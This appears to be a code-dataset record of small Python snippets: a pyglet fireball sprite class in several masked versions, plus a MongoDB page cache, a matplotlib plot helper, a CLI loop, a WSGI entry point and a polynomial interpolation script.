<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Fire(pyglet.sprite.Sprite):
def __init__(self, *args, **kwargs):
super(Fire, self).__init__(*args, img=fireball, **kwargs)
self.rotation = 45
self.rotate_speed = 5
self.velocity_x = 5
<|reserved_special_token_0|>
def update(self):
self.rotation += self.rotate_speed
self.x += self.velocity_x
self.check_bounds()
def remote_update(self, x, rotation):
self.rotation = rotation
self.x = x
self.check_bounds()
def distance(self, point_1=(0, 0), point_2=(0, 0)):
"""Returns the distance between two points"""
return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -
point_2[1]) ** 2)
def collides_with(self, other_object):
collision_distance = (self.image.width * 0.5 * self.scale +
other_object.image.width * 0.5 * other_object.scale)
actual_distance = self.distance(self.position, other_object.position)
return actual_distance <= collision_distance
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Fire(pyglet.sprite.Sprite):
def __init__(self, *args, **kwargs):
super(Fire, self).__init__(*args, img=fireball, **kwargs)
self.rotation = 45
self.rotate_speed = 5
self.velocity_x = 5
def check_bounds(self):
max_x = 1000 + self.image.width / 2
if self.x > max_x:
self.x = -self.image.width / 2
def update(self):
self.rotation += self.rotate_speed
self.x += self.velocity_x
self.check_bounds()
def remote_update(self, x, rotation):
self.rotation = rotation
self.x = x
self.check_bounds()
def distance(self, point_1=(0, 0), point_2=(0, 0)):
"""Returns the distance between two points"""
return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -
point_2[1]) ** 2)
def collides_with(self, other_object):
collision_distance = (self.image.width * 0.5 * self.scale +
other_object.image.width * 0.5 * other_object.scale)
actual_distance = self.distance(self.position, other_object.position)
return actual_distance <= collision_distance
<|reserved_special_token_1|>
import pyglet
import math
from lvl1_resources import fireball
class Fire(pyglet.sprite.Sprite):
def __init__(self, *args, **kwargs):
super(Fire, self).__init__(*args, img=fireball, **kwargs)
self.rotation = 45
self.rotate_speed = 5
self.velocity_x = 5
def check_bounds(self):
max_x = 1000 + self.image.width / 2
if self.x > max_x:
self.x = -self.image.width / 2
def update(self):
self.rotation += self.rotate_speed
self.x += self.velocity_x
self.check_bounds()
def remote_update(self, x, rotation):
self.rotation = rotation
self.x = x
self.check_bounds()
def distance(self, point_1=(0, 0), point_2=(0, 0)):
"""Returns the distance between two points"""
return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -
point_2[1]) ** 2)
def collides_with(self, other_object):
collision_distance = (self.image.width * 0.5 * self.scale +
other_object.image.width * 0.5 * other_object.scale)
actual_distance = self.distance(self.position, other_object.position)
return actual_distance <= collision_distance
<|reserved_special_token_1|>
import pyglet
import math
from lvl1_resources import fireball
class Fire(pyglet.sprite.Sprite):
    """A spinning fireball sprite that drifts rightward and wraps around."""

    def __init__(self, *args, **kwargs):
        super(Fire, self).__init__(img=fireball, *args, **kwargs)
        self.rotation = 45
        self.rotate_speed = 5
        self.velocity_x = 5

    def check_bounds(self):
        """Wrap the sprite back past the left edge once it leaves the right side."""
        # assumes a 1000-px-wide playfield — TODO confirm against window size
        right_limit = 1000 + self.image.width / 2
        if self.x > right_limit:
            self.x = -self.image.width / 2

    def update(self):
        """Advance one local frame: spin, move right, then wrap."""
        self.rotation += self.rotate_speed
        self.x += self.velocity_x
        self.check_bounds()

    def remote_update(self, x, rotation):
        """Apply a remotely-supplied position and rotation, then wrap."""
        self.rotation = rotation
        self.x = x
        self.check_bounds()

    def distance(self, point_1=(0, 0), point_2=(0, 0)):
        """Returns the distance between two points"""
        dx = point_1[0] - point_2[0]
        dy = point_1[1] - point_2[1]
        return math.sqrt(dx ** 2 + dy ** 2)

    def collides_with(self, other_object):
        """Circle-vs-circle collision test using scaled sprite half-widths."""
        collision_distance = (self.image.width * 0.5 * self.scale
                              + other_object.image.width * 0.5 * other_object.scale)
        actual_distance = self.distance(self.position, other_object.position)
        return actual_distance <= collision_distance
|
flexible
|
{
"blob_id": "cf2bbe332237bd849df62be099f1719eaf1f2082",
"index": 1523,
"step-1": "<mask token>\n\n\nclass Fire(pyglet.sprite.Sprite):\n <mask token>\n <mask token>\n\n def update(self):\n self.rotation += self.rotate_speed\n self.x += self.velocity_x\n self.check_bounds()\n\n def remote_update(self, x, rotation):\n self.rotation = rotation\n self.x = x\n self.check_bounds()\n\n def distance(self, point_1=(0, 0), point_2=(0, 0)):\n \"\"\"Returns the distance between two points\"\"\"\n return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -\n point_2[1]) ** 2)\n\n def collides_with(self, other_object):\n collision_distance = (self.image.width * 0.5 * self.scale + \n other_object.image.width * 0.5 * other_object.scale)\n actual_distance = self.distance(self.position, other_object.position)\n return actual_distance <= collision_distance\n",
"step-2": "<mask token>\n\n\nclass Fire(pyglet.sprite.Sprite):\n\n def __init__(self, *args, **kwargs):\n super(Fire, self).__init__(*args, img=fireball, **kwargs)\n self.rotation = 45\n self.rotate_speed = 5\n self.velocity_x = 5\n <mask token>\n\n def update(self):\n self.rotation += self.rotate_speed\n self.x += self.velocity_x\n self.check_bounds()\n\n def remote_update(self, x, rotation):\n self.rotation = rotation\n self.x = x\n self.check_bounds()\n\n def distance(self, point_1=(0, 0), point_2=(0, 0)):\n \"\"\"Returns the distance between two points\"\"\"\n return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -\n point_2[1]) ** 2)\n\n def collides_with(self, other_object):\n collision_distance = (self.image.width * 0.5 * self.scale + \n other_object.image.width * 0.5 * other_object.scale)\n actual_distance = self.distance(self.position, other_object.position)\n return actual_distance <= collision_distance\n",
"step-3": "<mask token>\n\n\nclass Fire(pyglet.sprite.Sprite):\n\n def __init__(self, *args, **kwargs):\n super(Fire, self).__init__(*args, img=fireball, **kwargs)\n self.rotation = 45\n self.rotate_speed = 5\n self.velocity_x = 5\n\n def check_bounds(self):\n max_x = 1000 + self.image.width / 2\n if self.x > max_x:\n self.x = -self.image.width / 2\n\n def update(self):\n self.rotation += self.rotate_speed\n self.x += self.velocity_x\n self.check_bounds()\n\n def remote_update(self, x, rotation):\n self.rotation = rotation\n self.x = x\n self.check_bounds()\n\n def distance(self, point_1=(0, 0), point_2=(0, 0)):\n \"\"\"Returns the distance between two points\"\"\"\n return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -\n point_2[1]) ** 2)\n\n def collides_with(self, other_object):\n collision_distance = (self.image.width * 0.5 * self.scale + \n other_object.image.width * 0.5 * other_object.scale)\n actual_distance = self.distance(self.position, other_object.position)\n return actual_distance <= collision_distance\n",
"step-4": "import pyglet\nimport math\nfrom lvl1_resources import fireball\n\n\nclass Fire(pyglet.sprite.Sprite):\n\n def __init__(self, *args, **kwargs):\n super(Fire, self).__init__(*args, img=fireball, **kwargs)\n self.rotation = 45\n self.rotate_speed = 5\n self.velocity_x = 5\n\n def check_bounds(self):\n max_x = 1000 + self.image.width / 2\n if self.x > max_x:\n self.x = -self.image.width / 2\n\n def update(self):\n self.rotation += self.rotate_speed\n self.x += self.velocity_x\n self.check_bounds()\n\n def remote_update(self, x, rotation):\n self.rotation = rotation\n self.x = x\n self.check_bounds()\n\n def distance(self, point_1=(0, 0), point_2=(0, 0)):\n \"\"\"Returns the distance between two points\"\"\"\n return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -\n point_2[1]) ** 2)\n\n def collides_with(self, other_object):\n collision_distance = (self.image.width * 0.5 * self.scale + \n other_object.image.width * 0.5 * other_object.scale)\n actual_distance = self.distance(self.position, other_object.position)\n return actual_distance <= collision_distance\n",
"step-5": "import pyglet\nimport math\nfrom lvl1_resources import fireball\n\nclass Fire(pyglet.sprite.Sprite):\n\tdef __init__( self, *args, **kwargs):\n\t\tsuper(Fire, self).__init__(img= fireball, *args, **kwargs)\n\t\tself.rotation= 45\n\t\tself.rotate_speed= 5\n\t\tself.velocity_x= 5\n\n\tdef check_bounds(self):\n\t\tmax_x= 1000 + self.image.width/2\n\t\tif self.x > max_x:\n\t\t\tself.x= -self.image.width/2\n\n\tdef update(self):\n\t\tself.rotation += self.rotate_speed\n\t\tself.x += self.velocity_x\n\t\tself.check_bounds()\n\n\tdef remote_update(self, x, rotation):\n\t\tself.rotation= rotation\n\t\tself.x= x\n\t\tself.check_bounds()\n\n\tdef distance(self, point_1=(0, 0), point_2=(0, 0)):\n\t\t\"\"\"Returns the distance between two points\"\"\"\n\t\treturn math.sqrt((point_1[0]-point_2[0])**2+(point_1[1]-point_2[1])**2)\n\n\tdef collides_with(self, other_object):\n\n\t\tcollision_distance = self.image.width*0.5*self.scale \\\n + other_object.image.width*0.5*other_object.scale\n \n\t\tactual_distance = self.distance(self.position, other_object.position)\n \n\t\treturn (actual_distance <= collision_distance)\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
import mysql.connector
import hashlib
import time
from datetime import datetime
from datetime import timedelta
from pymongo import MongoClient
from pymongo import IndexModel, ASCENDING, DESCENDING
class MongoManager:
    """Thin wrapper around a MongoDB collection used to cache crawled pages."""

    def __init__(self, server_ip='localhost', client=None, expires=timedelta(days=30)):
        """
        server_ip: host to connect to when no client is supplied
        client: mongo database client
        expires: timedelta of amount of time before a cache entry is considered expired
        """
        # NOTE(review): `expires` is accepted but never used by any method.
        # If a client object is not passed, connect to mongodb at the
        # default port on server_ip.
        self.client = MongoClient(server_ip, 27017) if client is None else client
        # Collection to store cached webpages, the equivalent of a table
        # in a relational database.
        self.db = self.client.spider
        # Create the url index only when the collection is empty.
        # BUGFIX: the original checked the unrelated `locations` collection
        # with `is 0` (identity, not equality); both are corrected here.
        # count_documents requires pymongo >= 3.7 (`count()` is removed in 4.x).
        if self.db.mfw.count_documents({}) == 0:
            self.db.mfw.create_index([("url", ASCENDING)])

    def query_by_url(self, url):
        """Return the list of cached documents for *url*, or None when absent."""
        # BUGFIX: find() returns a lazy cursor that is always truthy, so the
        # original `if records` could never take the None branch; materialize
        # the cursor before testing for emptiness.
        records = list(self.db.mfw.find({'url': url}))
        return records if records else None

    def insert_page(self, url, html):
        """Cache *html* under *url*.

        BUGFIX: the original passed ``'url': url, 'html': html`` directly as
        call arguments (a SyntaxError); the fields must be wrapped in a dict.
        insert_one is used (available in pymongo 3.x and 4.x).
        """
        self.db.mfw.insert_one({'url': url, 'html': html})

    def clear(self):
        """Drop the entire cache collection."""
        self.db.mfw.drop()
if __name__ == '__main__':
    # Smoke test: requires a MongoDB instance listening on localhost:27017.
    mongo_mgr = MongoManager()
|
normal
|
{
"blob_id": "4cb5dcf0d943ef15421bb6bced65804533d232e3",
"index": 4950,
"step-1": "import mysql.connector\nimport hashlib\nimport time \nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom pymongo import MongoClient\nfrom pymongo import IndexModel, ASCENDING, DESCENDING\n\n\nclass MongoManager:\n\n def __init__(self, server_ip='localhost', client=None, expires=timedelta(days=30)):\n \"\"\"\n client: mongo database client\n expires: timedelta of amount of time before a cache entry is considered expired\n \"\"\"\n # if a client object is not passed \n # then try connecting to mongodb at the default localhost port \n self.client = MongoClient(server_ip, 27017) if client is None else client\n #create collection to store cached webpages,\n # which is the equivalent of a table in a relational database\n self.db = self.client.spider\n\n # create index if db is empty\n if self.db.locations.count() is 0:\n self.db.mfw.create_index([(\"url\", ASCENDING)])\n\n def query_by_url(self, url):\n records = self.db.mfw.find({'url':url})\n\n if records:\n return records\n else:\n return None\n\n def insert_page(self, url, html):\n self.db.mfw.insert(\n 'url': url,\n 'html':html\n )\n\n def clear(self):\n self.db.mfw.drop()\n\nif __name__ == '__main__':\n mongo_mgr = MongoManager()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def xyplot(xdata, ydata, title):
fname = '/Users/nalmog/Desktop/swa_equipped_cumulative_' + title + '.png'
plt.plot(xdata, ydata)
plt.ylabel('some numbers')
plt.title(title)
plt.xlabel('Percent of Fleet')
plt.ylabel('Number of Passes')
plt.savefig(fname)
plt.clf()
<|reserved_special_token_1|>
import matplotlib.pyplot as plt
def xyplot(xdata, ydata, title):
fname = '/Users/nalmog/Desktop/swa_equipped_cumulative_' + title + '.png'
plt.plot(xdata, ydata)
plt.ylabel('some numbers')
plt.title(title)
plt.xlabel('Percent of Fleet')
plt.ylabel('Number of Passes')
plt.savefig(fname)
plt.clf()
<|reserved_special_token_1|>
import matplotlib.pyplot as plt
def xyplot(xdata, ydata, title):
    """Plot ydata against xdata and save the figure as a PNG.

    The image is written to
    /Users/nalmog/Desktop/swa_equipped_cumulative_<title>.png and the current
    figure is cleared afterwards so successive calls do not accumulate lines.

    Removed: a stray ylabel('some numbers') call that was immediately
    overwritten below, plus commented-out dead code.
    """
    fname = "/Users/nalmog/Desktop/swa_equipped_cumulative_" + title + ".png"
    plt.plot(xdata, ydata)
    plt.title(title)
    plt.xlabel("Percent of Fleet")
    plt.ylabel("Number of Passes")
    plt.savefig(fname)
    plt.clf()
|
flexible
|
{
"blob_id": "10a7c1827abb8a87f5965453aa2d8f5e8b4914e5",
"index": 6563,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef xyplot(xdata, ydata, title):\n fname = '/Users/nalmog/Desktop/swa_equipped_cumulative_' + title + '.png'\n plt.plot(xdata, ydata)\n plt.ylabel('some numbers')\n plt.title(title)\n plt.xlabel('Percent of Fleet')\n plt.ylabel('Number of Passes')\n plt.savefig(fname)\n plt.clf()\n",
"step-3": "import matplotlib.pyplot as plt\n\n\ndef xyplot(xdata, ydata, title):\n fname = '/Users/nalmog/Desktop/swa_equipped_cumulative_' + title + '.png'\n plt.plot(xdata, ydata)\n plt.ylabel('some numbers')\n plt.title(title)\n plt.xlabel('Percent of Fleet')\n plt.ylabel('Number of Passes')\n plt.savefig(fname)\n plt.clf()\n",
"step-4": "import matplotlib.pyplot as plt\n\ndef xyplot(xdata,ydata,title):\n fname = \"/Users/nalmog/Desktop/swa_equipped_cumulative_\"+title+\".png\"\n #plt.figure(figsize=(500,500))\n plt.plot(xdata, ydata)\n plt.ylabel('some numbers') \n# plt.savefig(\"/Users/nalmog/Desktop/swa_equipped_cumulative_\"+title+\".png\", format='png')\n #plt.show()\n #plt.savefig(\"/Users/nalmog/Desktop/swa_equipped_cumulative_\"+title+\".png\", format='png')\n plt.title(title) \n plt.xlabel(\"Percent of Fleet\")\n plt.ylabel(\"Number of Passes\")\n plt.savefig(fname)\n plt.clf();\n #plt.\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def cmdline():
available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']
keepgoing = True
while keepgoing:
typed = input("Type something. (Type 'help' for options)")
words = [w for w in typed.split(' ')]
command = words[0].lower()
arguments = words[1:]
if command == '':
continue
if command not in available_commands:
print(f'-> {command} is an invalid command. Available commands:',
available_commands)
continue
if command == 'help':
print('-> Try out the following commands', available_commands)
if command == 'echo':
print(f"-> {' '.join(arguments)}")
if command == 'pbar':
for i in range(21):
sys.stdout.write('\r')
sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))
sys.stdout.flush()
sleep(0.25)
print(' done!')
if command == 'joke':
import requests
joke = requests.get(
'https://official-joke-api.appspot.com/random_joke').json()
print(f"-> {joke['setup']}")
input('-> (press enter)')
print(f"-> {joke['punchline']}")
if command == 'quit':
keepgoing = False
else:
print('exiting..')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def cmdline():
available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']
keepgoing = True
while keepgoing:
typed = input("Type something. (Type 'help' for options)")
words = [w for w in typed.split(' ')]
command = words[0].lower()
arguments = words[1:]
if command == '':
continue
if command not in available_commands:
print(f'-> {command} is an invalid command. Available commands:',
available_commands)
continue
if command == 'help':
print('-> Try out the following commands', available_commands)
if command == 'echo':
print(f"-> {' '.join(arguments)}")
if command == 'pbar':
for i in range(21):
sys.stdout.write('\r')
sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))
sys.stdout.flush()
sleep(0.25)
print(' done!')
if command == 'joke':
import requests
joke = requests.get(
'https://official-joke-api.appspot.com/random_joke').json()
print(f"-> {joke['setup']}")
input('-> (press enter)')
print(f"-> {joke['punchline']}")
if command == 'quit':
keepgoing = False
else:
print('exiting..')
if __name__ == '__main__':
cmdline()
<|reserved_special_token_1|>
from time import sleep
import sys
def cmdline():
available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']
keepgoing = True
while keepgoing:
typed = input("Type something. (Type 'help' for options)")
words = [w for w in typed.split(' ')]
command = words[0].lower()
arguments = words[1:]
if command == '':
continue
if command not in available_commands:
print(f'-> {command} is an invalid command. Available commands:',
available_commands)
continue
if command == 'help':
print('-> Try out the following commands', available_commands)
if command == 'echo':
print(f"-> {' '.join(arguments)}")
if command == 'pbar':
for i in range(21):
sys.stdout.write('\r')
sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))
sys.stdout.flush()
sleep(0.25)
print(' done!')
if command == 'joke':
import requests
joke = requests.get(
'https://official-joke-api.appspot.com/random_joke').json()
print(f"-> {joke['setup']}")
input('-> (press enter)')
print(f"-> {joke['punchline']}")
if command == 'quit':
keepgoing = False
else:
print('exiting..')
if __name__ == '__main__':
cmdline()
<|reserved_special_token_1|>
from time import sleep
import sys
def cmdline():
    """Minimal interactive command loop.

    Supported commands: help, quit, echo, pbar (animated progress bar),
    joke (fetches a random joke from a public API).  Loops until 'quit'.
    """
    available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']
    keepgoing = True
    while keepgoing:
        typed = input("Type something. (Type 'help' for options)")
        words = typed.split(" ")
        command = words[0].lower()
        arguments = words[1:]

        if command == '':
            continue
        if command not in available_commands:
            print(f"-> {command} is an invalid command. Available commands:", available_commands)
            continue

        if command == 'help':
            print('-> Try out the following commands', available_commands)
        if command == 'echo':
            print(f'-> {" ".join(arguments)}')
        if command == 'pbar':
            # Draw a 20-step progress bar, redrawing the same line with '\r'.
            for i in range(21):
                sys.stdout.write('\r')
                sys.stdout.write("[%-20s] %d%%" % ('=' * i, 5 * i))
                sys.stdout.flush()
                sleep(0.25)
            print(' done!')
        if command == 'joke':
            import requests
            joke = requests.get("https://official-joke-api.appspot.com/random_joke").json()
            print(f"-> {joke['setup']}")
            input("-> (press enter)")
            print(f"-> {joke['punchline']}")
        if command == 'quit':
            # BUG FIX: the original attached an `else: print("exiting..")`
            # to this `if`, so every non-quit command printed "exiting.."
            # and quitting printed nothing.  Print it on quit instead.
            keepgoing = False
            print("exiting..")
if __name__ == "__main__":
cmdline()
|
flexible
|
{
"blob_id": "a028661f9bcaa6dfe5389cb57f31b07d7e981487",
"index": 9890,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef cmdline():\n available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']\n keepgoing = True\n while keepgoing:\n typed = input(\"Type something. (Type 'help' for options)\")\n words = [w for w in typed.split(' ')]\n command = words[0].lower()\n arguments = words[1:]\n if command == '':\n continue\n if command not in available_commands:\n print(f'-> {command} is an invalid command. Available commands:',\n available_commands)\n continue\n if command == 'help':\n print('-> Try out the following commands', available_commands)\n if command == 'echo':\n print(f\"-> {' '.join(arguments)}\")\n if command == 'pbar':\n for i in range(21):\n sys.stdout.write('\\r')\n sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))\n sys.stdout.flush()\n sleep(0.25)\n print(' done!')\n if command == 'joke':\n import requests\n joke = requests.get(\n 'https://official-joke-api.appspot.com/random_joke').json()\n print(f\"-> {joke['setup']}\")\n input('-> (press enter)')\n print(f\"-> {joke['punchline']}\")\n if command == 'quit':\n keepgoing = False\n else:\n print('exiting..')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef cmdline():\n available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']\n keepgoing = True\n while keepgoing:\n typed = input(\"Type something. (Type 'help' for options)\")\n words = [w for w in typed.split(' ')]\n command = words[0].lower()\n arguments = words[1:]\n if command == '':\n continue\n if command not in available_commands:\n print(f'-> {command} is an invalid command. Available commands:',\n available_commands)\n continue\n if command == 'help':\n print('-> Try out the following commands', available_commands)\n if command == 'echo':\n print(f\"-> {' '.join(arguments)}\")\n if command == 'pbar':\n for i in range(21):\n sys.stdout.write('\\r')\n sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))\n sys.stdout.flush()\n sleep(0.25)\n print(' done!')\n if command == 'joke':\n import requests\n joke = requests.get(\n 'https://official-joke-api.appspot.com/random_joke').json()\n print(f\"-> {joke['setup']}\")\n input('-> (press enter)')\n print(f\"-> {joke['punchline']}\")\n if command == 'quit':\n keepgoing = False\n else:\n print('exiting..')\n\n\nif __name__ == '__main__':\n cmdline()\n",
"step-4": "from time import sleep\nimport sys\n\n\ndef cmdline():\n available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']\n keepgoing = True\n while keepgoing:\n typed = input(\"Type something. (Type 'help' for options)\")\n words = [w for w in typed.split(' ')]\n command = words[0].lower()\n arguments = words[1:]\n if command == '':\n continue\n if command not in available_commands:\n print(f'-> {command} is an invalid command. Available commands:',\n available_commands)\n continue\n if command == 'help':\n print('-> Try out the following commands', available_commands)\n if command == 'echo':\n print(f\"-> {' '.join(arguments)}\")\n if command == 'pbar':\n for i in range(21):\n sys.stdout.write('\\r')\n sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))\n sys.stdout.flush()\n sleep(0.25)\n print(' done!')\n if command == 'joke':\n import requests\n joke = requests.get(\n 'https://official-joke-api.appspot.com/random_joke').json()\n print(f\"-> {joke['setup']}\")\n input('-> (press enter)')\n print(f\"-> {joke['punchline']}\")\n if command == 'quit':\n keepgoing = False\n else:\n print('exiting..')\n\n\nif __name__ == '__main__':\n cmdline()\n",
"step-5": "from time import sleep\nimport sys\n\ndef cmdline():\n available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']\n keepgoing = True\n while (keepgoing):\n typed = input(\"Type something. (Type 'help' for options)\")\n words = [w for w in typed.split(\" \")]\n command = words[0].lower()\n arguments = words[1:]\n\n if (command == ''):\n continue\n if (command not in available_commands):\n print(f\"-> {command} is an invalid command. Available commands:\", available_commands)\n continue\n\n if (command == 'help'):\n print('-> Try out the following commands', available_commands)\n if (command == 'echo'):\n print(f'-> {\" \".join(arguments)}')\n if (command == 'pbar'):\n for i in range(21):\n sys.stdout.write('\\r')\n # the exact output you're looking for:\n sys.stdout.write(\"[%-20s] %d%%\" % ('=' * i, 5 * i))\n sys.stdout.flush()\n sleep(0.25)\n print(' done!')\n\n if (command == 'joke'):\n import requests\n joke = requests.get(\"https://official-joke-api.appspot.com/random_joke\").json()\n print(f\"-> {joke['setup']}\")\n input(\"-> (press enter)\")\n print(f\"-> {joke['punchline']}\")\n\n if (command == 'quit'):\n keepgoing = False\n\n\n else:\n print(\"exiting..\")\n\n\nif __name__ == \"__main__\":\n cmdline()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# encoding=UTF-8
# This file serves the project in production
# See http://wsgi.readthedocs.org/en/latest/
from __future__ import unicode_literals
from moya.wsgi import Application
# WSGI entry point: build the Moya application from the project directory,
# layering production.ini over local.ini, using the "main" server definition
# and the production logging configuration.
application = Application(
    "./", ["local.ini", "production.ini"], server="main", logging="prodlogging.ini"
)
|
normal
|
{
"blob_id": "cb0be932813a144cfb51b3aa2f6e0792e49c4945",
"index": 3021,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napplication = Application('./', ['local.ini', 'production.ini'], server=\n 'main', logging='prodlogging.ini')\n",
"step-3": "from __future__ import unicode_literals\nfrom moya.wsgi import Application\napplication = Application('./', ['local.ini', 'production.ini'], server=\n 'main', logging='prodlogging.ini')\n",
"step-4": "# encoding=UTF-8\n\n# This file serves the project in production\n# See http://wsgi.readthedocs.org/en/latest/\n\nfrom __future__ import unicode_literals\nfrom moya.wsgi import Application\n\napplication = Application(\n \"./\", [\"local.ini\", \"production.ini\"], server=\"main\", logging=\"prodlogging.ini\"\n)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import numpy as np
from scipy.linalg import solve
from matplotlib import pylab as plt
def f(x):
    """Evaluate sin(x/5)*exp(x/10) + 5*exp(-x/2), elementwise for arrays."""
    oscillation = np.sin(x / 5) * np.exp(x / 10)
    decay = 5 * np.exp(-x / 2)
    return oscillation + decay
xx = np.arange(1, 15, 0.1)
yy = f(xx)

# Interpolate f with polynomials of degree 1, 2 and 3: for each node set,
# solve the Vandermonde system A.w = f(x) and plot the resulting polynomial
# against the true curve.
for nodes in ([1, 15], [1, 8, 15], [1, 4, 10, 15]):
    x = np.array(nodes)
    y = f(x)
    # Row i holds the powers of node i: [1, xi, xi**2, ...].
    A = np.array([[xi ** k for k in range(len(nodes))] for xi in nodes])
    w = solve(A, y)
    approx = sum(w[k] * xx ** k for k in range(len(nodes)))
    plt.plot(xx, approx, '-', xx, yy, '-')
    plt.show()

# Report the coefficients of the last (degree-3) fit, rounded to 2 decimals.
print("w 0:4 : ", " ".join(map(str, np.round(w, 2))))
|
normal
|
{
"blob_id": "a610ccf4fe154ee12de9212a10958fda2000b425",
"index": 7122,
"step-1": "<mask token>\n\n\ndef f(x):\n return np.sin(x / 5) * np.exp(x / 10) + 5 * np.exp(-x / 2)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef f(x):\n return np.sin(x / 5) * np.exp(x / 10) + 5 * np.exp(-x / 2)\n\n\n<mask token>\nplt.plot(xx, y1, '-', xx, yy, '-')\nplt.show()\n<mask token>\nplt.plot(xx, y2, '-', xx, yy, '-')\nplt.show()\n<mask token>\nplt.plot(xx, y3, '-', xx, yy, '-')\nplt.show()\nprint('w 0:4 : ', ' '.join(map(str, np.round(w, 2))))\n",
"step-3": "<mask token>\n\n\ndef f(x):\n return np.sin(x / 5) * np.exp(x / 10) + 5 * np.exp(-x / 2)\n\n\nxx = np.arange(1, 15, 0.1)\nyy = f(xx)\nx = np.array([1, 15])\ny = f(x)\nA = np.array([[1, 1], [1, 15]])\nw = solve(A, y)\ny1 = w[0] + w[1] * xx\nplt.plot(xx, y1, '-', xx, yy, '-')\nplt.show()\nx = np.array([1, 8, 15])\ny = f(x)\nA = np.array([[1, 1, 1], [1, 8, 64], [1, 15, 225]])\nw = solve(A, y)\ny2 = w[0] + w[1] * xx + w[2] * xx ** 2\nplt.plot(xx, y2, '-', xx, yy, '-')\nplt.show()\nx = np.array([1, 4, 10, 15])\ny = f(x)\nA = np.array([[1, 1, 1, 1], [1, 4, 16, 64], [1, 10, 100, 1000], [1, 15, 225,\n 225 * 15]])\nw = solve(A, y)\ny3 = w[0] + w[1] * xx + w[2] * xx ** 2 + w[3] * xx ** 3\nplt.plot(xx, y3, '-', xx, yy, '-')\nplt.show()\nprint('w 0:4 : ', ' '.join(map(str, np.round(w, 2))))\n",
"step-4": "import numpy as np\nfrom scipy.linalg import solve\nfrom matplotlib import pylab as plt\n\n\ndef f(x):\n return np.sin(x / 5) * np.exp(x / 10) + 5 * np.exp(-x / 2)\n\n\nxx = np.arange(1, 15, 0.1)\nyy = f(xx)\nx = np.array([1, 15])\ny = f(x)\nA = np.array([[1, 1], [1, 15]])\nw = solve(A, y)\ny1 = w[0] + w[1] * xx\nplt.plot(xx, y1, '-', xx, yy, '-')\nplt.show()\nx = np.array([1, 8, 15])\ny = f(x)\nA = np.array([[1, 1, 1], [1, 8, 64], [1, 15, 225]])\nw = solve(A, y)\ny2 = w[0] + w[1] * xx + w[2] * xx ** 2\nplt.plot(xx, y2, '-', xx, yy, '-')\nplt.show()\nx = np.array([1, 4, 10, 15])\ny = f(x)\nA = np.array([[1, 1, 1, 1], [1, 4, 16, 64], [1, 10, 100, 1000], [1, 15, 225,\n 225 * 15]])\nw = solve(A, y)\ny3 = w[0] + w[1] * xx + w[2] * xx ** 2 + w[3] * xx ** 3\nplt.plot(xx, y3, '-', xx, yy, '-')\nplt.show()\nprint('w 0:4 : ', ' '.join(map(str, np.round(w, 2))))\n",
"step-5": "import numpy as np\r\nfrom scipy.linalg import solve\r\nfrom matplotlib import pylab as plt\r\n\r\ndef f(x):\r\n return (np.sin(x / 5) * np.exp(x / 10) + 5 * np.exp(-x / 2))\r\n\r\nxx = np.arange(1, 15, 0.1)\r\nyy = f(xx)\r\n\r\n# 1 степень\r\nx = np.array([1,15])\r\ny = f(x)\r\n\r\nA = np.array([[1,1], [1,15]])\r\nw = solve(A, y)\r\n\r\ny1 = w[0] + w[1]*xx\r\n\r\nplt.plot(xx, y1, '-', xx, yy, '-')\r\nplt.show()\r\n\r\n# 2 степень\r\nx = np.array([1, 8, 15])\r\ny = f(x)\r\n\r\nA = np.array([[1,1,1], [1,8,64], [1,15,225]])\r\nw = solve(A, y)\r\n\r\ny2 = w[0] + w[1]*xx + w[2]*(xx**2)\r\n\r\nplt.plot(xx, y2, '-', xx, yy, '-')\r\nplt.show()\r\n\r\n# 3 степень\r\nx = np.array([1, 4, 10, 15])\r\ny = f(x)\r\n\r\nA = np.array([[1,1,1,1], [1,4,16,64], [1,10,100,1000], [1,15,225,225*15]])\r\nw = solve(A, y)\r\n\r\ny3 = w[0] + w[1]*xx + w[2]*(xx**2) + w[3]*(xx**3)\r\n\r\nplt.plot(xx, y3, '-', xx, yy, '-')\r\nplt.show()\r\n\r\nprint(\"w 0:4 : \", \" \".join(map(str, np.round(w, 2))))",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
